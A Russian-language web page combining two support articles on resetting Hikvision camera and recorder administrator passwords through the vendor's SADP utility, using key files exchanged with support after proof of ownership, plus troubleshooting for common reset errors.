  • Выбрать устройство, которое мы хотим разблокировать
  • Чтобы разблокировать устройство, необходимо рядом с кнопкой Импорта указать файл разблокировки пароля, а затем нажмите кнопку Импорт,
  • Пароль для устройства будет сброшен до заводских настроек.

В окне программы SADP. Красным цветом выделена область, экспорта и импорта файлов, позволяющих сбросить пароль к заводским настройкам.Пароль для учетной записи администратора будет восстановлен до заводских настроек. В случае первого способа, описанного выше, по умолчанию: 12345, в случае второго способа необходимо установить новый пароль при активации камеры или регистратора (без пароля по умолчанию). При первом входе в систему необходимо установить или изменить пароль для предотвращения несанкционированных доступа третьих лиц. Мы настоятельно рекомендуем вам использовать надежный пароль для повышения безопасности. Надежный пароль должен содержать от 8 до 16 символов, среди которых должны быть, по крайней мере, три вида из следующих символов: цифры, строчные буквы, прописные буквы, специальные символы.

5. Сброс и присвоение нового пароля администратора.

Есть возможность создания нового пароля администратора в случае его утраты. Для этого необходимо во вкладке «Reset password»:

  • Выбрать устройство,
  • Ввести и подтвердить новый пароль ( рекомендуем создать надежный пароль),
  • Во вкладке рядом с кнопкой Export, следует указать место, в котором будет сохранен файл, позволяющий восстановить пароль (следует отметить только расположение папки в которую будет экспортирован файл с именем DeviceKey.xml)
  • Нажмите кнопку «Export»,
  • Затем эти данные необходимо представить в отдел технической поддержки [email protected] Ответ  придет. В течении 1-2 рабочих дня
  • Выбрать устройство, которое мы хотим разблокировать
  • Чтобы разблокировать устройство, необходимо рядом с кнопкой Импорта указать файл разблокировки пароля, а затем нажмите кнопку Импорт,
  • Пароль для устройства будет изменен на такой, который был введен.

zapishemvse.ru

Сброс пароля на устройствах Hikvision с помощью утилиты SADP | НПО "Инфотех"

Сброс пароля на устройствах Hikvision с помощью утилиты SADP

16/09/2016

Для сброса пароля на устройствах Hikvision необходимо выполнить несколько действий.

  1. Необходимо скачать и установить утилиту SADP (версия v3.0.0.2 и выше). Скачать можно здесь.
  2. Сфотографировать и сохранить фотографию наклейки, со штрихкодом на самом устройстве. Данную фотографию нужно будет отправить на почту техподдержки. 

     

  3. Перезагружаем устройство и запускаем SADP. После запуска SADP, увидим такое окно:
  4. Стоит обратить внимание на столбик “Security””Active” – устройство активно и пароль установлен.
  5. Выбираем нужное устройство, отмечая его галкой и нажимаем надпись “Forgot Password”.
  6. Появится такое окно с инструкцией (если на этом этапе увидели другое окно, перейдите на пункт 12):Следуя инструкции, выполним первый шаг:нажимаем кнопочку “Export” и выбираем папку, в которую сохранится экспортируемый файл.По окончанию этого процесса увидим окно:(устройство после экспорта файлика перезагружать нельзя)
  7. Далее идем в выбранную папку и ищем там файл с расширением “.xml”.Файл может называться “DeviceKey” или в его названии будет модель устройства, серийный номер и в конце дата и время выгрузки.                                                            
  8. Отправляем этот файл к нам в поддержку, вместе с подтверждением, что вы купили устройство. Если мы вас знаем - напишите как вы называетесь по нашей базе. Если мы вас не знаем - пришлите нам что-нибудь подтверждающее факт владения устройством: чек, фото коробки, гарантийный талон с серийным номером. Это нужно для того, чтобы исключить сброс пароля недобросовестным лицам. Кроме этого, отправляем фотографию наклейки устройства (см. пункт №2).                                                                     
  9. После утверждения Вашей заявки, ответом на письмо придет новый файл “Encrypt.xml”. Вы его сохраняете на компьютер.
  10. Снова выполняем четвертый пункт и, следуя инструкции, переходим на второй шаг:Указываем путь к полученному файлу, задаем и подтверждаем новый пароль, и нажимаем кнопку “Confirm”.Пароль должен состоять не мене чем из 8 символов (большие и маленькие буквы английского алфавита, цифры, специальные символы). Подробнее про пароль здесь - http://infoteh.com.ua/news/aktivacia-ustroistv-hikvision.
  11. Если все сделано правильно увидим окно и на устройстве будет установлен заданный пароль.
  12. На устройстве будет установлен заданный пароль.Если по причине выключения устройства или из-за других причин будет сообщение о невозможности применить новые данные, то процедуру будет необходимо выполнить заново с первого пункта.

    Для снятия файла, который Вы отправляете нам, и подтягивания, присланного нами, во втором шаге у Вас есть только 1 календарные сутки, причём до выполнения последней операции нельзя выключать или перезагружать устройство.

  13. Если устройство старое или со старой прошивкой, и нажав на надпись “Forgot Password” увидите такое окошко:

    тогда необходимо скопировать полную модель устройства (поле "Device Serial №" в SADP) и дату старта (поле "Start Time" в SADP).

    Данные должны быть в текстовом формате, скриншоты и фотографии не подходят.

    Эти данные отправить нам в поддержку (устройство после этого перезагружать нельзя,). В ответ мы отправим код для сброса. Пароль сбросится на стандартный – 12345.

    Успехов.

Ошибка: Get key error

При экспорте XML-файла ключа, SADP отображает сообщение Get key error

Возможные причины:1. ПК и устройство подключены через более чем один коммутатор, которые не поддерживают функцию multi-cast2. ПК и устройство подключены через маршрутизатор, и на маршрутизаторе и на устройстве включена функция NAT3. IP-адрес ПК изменился пока открывалось ПО SADP4. Некорректная прошивка устройства

Возможные решения:1. Когда устройство и ПК подключены более чем через один коммутатор, пожалуйста, убедитесь, что маршрутизаторы поддерживают функцию multi-cast, так как она необходима для процесса активации и сброса устройства.2. Когда ПК и устройство подключены через маршрутизатор, попробуйте отключить функцию NAT в маршрутизаторе и устройстве. Когда активирован NAT, устройство не получает multi-cast сообщения.3. Когда ПК и устройство подключены напрямую и IP-адрес ПК изменился в то время, как SADP была открыта, просто перезапустите SADP.4. Попробуйте перепрошить устройство, например используя TFTP.

 

Ошибка: Reset password failed

При экспорте файла-ключа, SADP сообщает: reset password failed.

Возможные причины:1. Возможно, вы пытаетесь использовать уже использованный или старый xml-файл ключа.2. Возможно, вы сформировали новый xml-ключ для отправки, в таком случае, старые файлы сбрса более не подходят.3. Возможно есть проблемы с присланным вам файлом4. Адрес ПК изменился пока SADP была открыта

Возможные решения:1. Убедитесь что вы используете актуальный файл=ключ для разблокировки2. Убедитесь, что вы не перезагружали устройство и не формировали новый файлключ для отправки.3. Запросите новый файл ключа у службы технической поддержки4. Когда ПК и устройство подключены напрямую и IP­адрес ПК изменился в то время, как SADP была открыта, просто перезапустите SADP

 

infotech.com.ua


Смотрите также